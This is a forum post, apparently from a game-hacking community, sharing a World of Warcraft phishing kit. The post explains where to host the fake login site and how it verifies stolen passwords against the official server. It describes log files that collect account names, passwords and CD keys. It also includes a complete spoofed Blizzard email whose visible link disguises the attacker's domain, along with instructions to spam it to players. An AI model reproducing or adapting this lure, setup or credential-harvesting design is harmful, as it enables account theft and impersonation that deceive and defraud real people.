Hello everyone! This is my first try on contributing so I hope you like it :P
I want to state first of all that this is not entirely my work. The page layout and basic code of the webpage design and build-up is done by Moji and I owe Apoc a lot of the credits too for his account checker.
INTRODUCTION
I've been working very briefly with all the phishing sides and set up one myself not long ago. This is mostly a copy of Moji's web phisher, and I used his side as a template and made only a few changes which I will mention later in my post. When Apoc released his account check functionality tool many people were asking how they should put this piece of code to use. I sat down and did so, and here it is for all of you. Enjoy!
THE CHANGES
This side is practically what Moji uploaded here: http://www.mmowned.com/forums/wow-sc...hing-scam.html with a few changes. These changes are as follows:
1. Account Check Functionality tool has been implemented into the login page, and if the user types in a wrong password it will lead him to the "Error" page saying Incorrect Password. If the user types the right password and enters account information that is actually true, he is led on to the account verification page and the account name and password is logged.
2. I have polished the Account Verification page itself. There is no more "Additional information" but instead I've added the ability to type in a Wrath of the Lich king CD-key, which is also logged.
3. I've made it European. I will be releasing a US version soon.
DOWNLOAD LINK
Use the following link to download the phisher:
- MEGAUPLOAD - The leading online storage and file delivery service
SETTING UP YOUR PHISHER
This is pretty straight forward. Upload all the files in their respective folders on a webside of your choice. (!!NOTE!! - Your hoster needs to have cURL enabled!)
I myself is using Free Hosting With No Ads | 50gigs.net for this purpose.
It works almost like ripway and you get a free .co.cc domain on top.
Once you've uploaded the files the side is ready to phish up everyone you send to it. Happy hunting!
THE MEANING OF THE PHISHER
That's all good, but how does it work and how are you supposed to use it? This phisher is designed to be used against people selling their accounts or people who are in trouble with the EULA and/or blizzard. Use a fake emailer like holypage and send them an email from Blizzard saying:
Now spam this email to everyone you want to get into your trap, just remember to change the webside to yours. Remember that this email is also made for European users. I will be making a US version soon.Code:Greetings, <br><br> An investigation of your World of Warcraft account has found strong evidence that the account in question is being sold or traded. As you may not be aware of, this conflicts with Blizzard's EULA under section 4 Paragraph B which can be found here: <a href=http://www.wow-europe.com/en/legal/eula.html target="_blank"> WoW -> Legal -> End User License Agreement </a> <br> and Section 8 of the Terms of Use found here: <br> <a href=http://www.wow-europe.com/en/legal/termsofuse.html target="_blank"> WoW -> Legal -> Terms of Use</a><br><br> The investigation will be continued by Blizzard administration to determine the action to be taken against your account. If your account is found violating the EULA and Terms of Use, your account can, and will be suspended/closed/or terminated. <br> In order to keep this from occurring, you should immediately verify that you are the original owner of the account. <br><br> To verify your identity please visit the following webpage: <br> <a href=http://YOURWEBSIDEHERE.co.cc target="_blank">https://www.wow-europe.com/login/login?service=https%3A%2F%2Fwww.wow-europe.com%2Faccount%2Findex.html</a><br> Only Account and Billing Management will be able to assist with account retrieval issues. Thank you for your time and attention to this matter, and your continued interest in World of Warcraft. <br> <br><br> Sincerely, <br><br> Account and Billing Management<br> Blizzard Entertainment<br> <a href= http://us.blizzard.com/support/article/21505 target="_blank"> </a>
There are 2 html pages by standard set as log files. One of the files is the log for the login screen and one for the verification page itself.
/accinflog.html - This is where the account name and password from the login page is logged to. These are never wrong when entered as they're checked by the official (EU) wow side.
/totalinfolog.html - This is where all the account info that the user enters after logging in goes to. This information is unchecked and the user can write whatever he wants in the fields, but hey - he already checked if the login screen was a fake hopefully, and hopefully he won't question the next page
If I've missed something out, please check with Moji's post linked in the credits. If you can't find anything in his guide (My guide is pretty rough) then feel free to ask me here!
CREDITS
Big thanks to Moji for making a great phishing side (http://www.mmowned.com/forums/wow-sc...hing-scam.html)
Also a big thanks to Apoc for making the account checking tool (http://www.mmowned.com/forums/wow-sc...-phishers.html)
// Drakke